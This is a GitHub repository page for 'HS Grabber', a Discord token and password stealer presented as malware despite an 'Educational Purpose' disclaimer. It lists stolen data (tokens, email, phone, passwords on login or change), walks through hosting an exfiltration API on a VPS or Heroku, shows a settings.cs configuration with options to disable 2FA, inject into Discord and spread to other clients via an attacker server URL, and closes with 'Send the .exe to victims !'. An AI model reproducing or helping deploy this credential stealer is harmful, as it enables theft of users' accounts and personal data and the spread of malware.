Skip to content

An discord token grabber / stealer stole discord password etc, same when you change password - Educational Purpose

Notifications You must be signed in to change notification settings

Salt69/HS-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 

Repository files navigation

⚠️ Personal Purpose, we are not responsable of your acts ⚠️

HS Grabber

An powerful discord token grabber / discord token stealer stole discord password, info, etc, same when you change password. Need a screenshot ?

  • 10 Star = video tutorial
  • 15 Star = auto builder

Features

  • Steal Discord info
    • Username
    • E-mail
    • Phone Number
    • Nitro Type
    • ID
  • Steal Discord token
    • Discord
    • Discord PTB
    • Discord Dev
  • Steal Discord Password : When you change password & When you change e-mail & When you log-in in your discord account
    • Discord
    • Discord PTB
    • Discord Dev

How to use

#1 : API Hosting

Method 1 : (require a vps)

Open port 80

Install Apache2 :

$ sudo apt-get update
$ sudo apt-get install apache2

Test server :

$ curl urserverurl

Configure Firewall :

$ sudo ufw allow 'Apache'

Verify the change :

$ sudo ufw status

Install API :

$ git clone https://github.com/Stanley-GF/api.git

Configure port & ip in the main index.js

$ cd api
$ nano index.js

Configure webhook url :

$ cd api/endpoints
$ nano index.js

Your API URL gonna be : http://your-vps-ip/api/v1/send (replace your-vps-ip by ur real vps ip, obviously)

Method 2 : Heroku (the best for beginner)

#2 : Your .exe

  • Download src of this project
  • Open project
  • Go in settings.cs and configure option :
public static bool disableMfa = false; // disable 2FA 

public static bool restartDiscord = true; // restart discord after injection

public static bool spread = true; // ALWAYS TRUE : (for infect client)

private static string serverurl = "https://your-app-name.herokuapp.com/api/v1/send"; // replace "your-app-name.herokuapp.com/api/v1/send" by your api url

public static string Url = "https://cors-anywhere2.herokuapp.com/" + serverurl; // don't tuch.
  • Compile the project
  • Go in \HS-Grabber\HS-Grabber\bin\Debug
  • Send the .exe to victims !

Some screenshot of the grabber

yay

Coded with ❤️ By

Name Helped for
HideakiAtsuyo API
Stan Code & a bit of the API
Igor API

About

An discord token grabber / stealer stole discord password etc, same when you change password - Educational Purpose

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages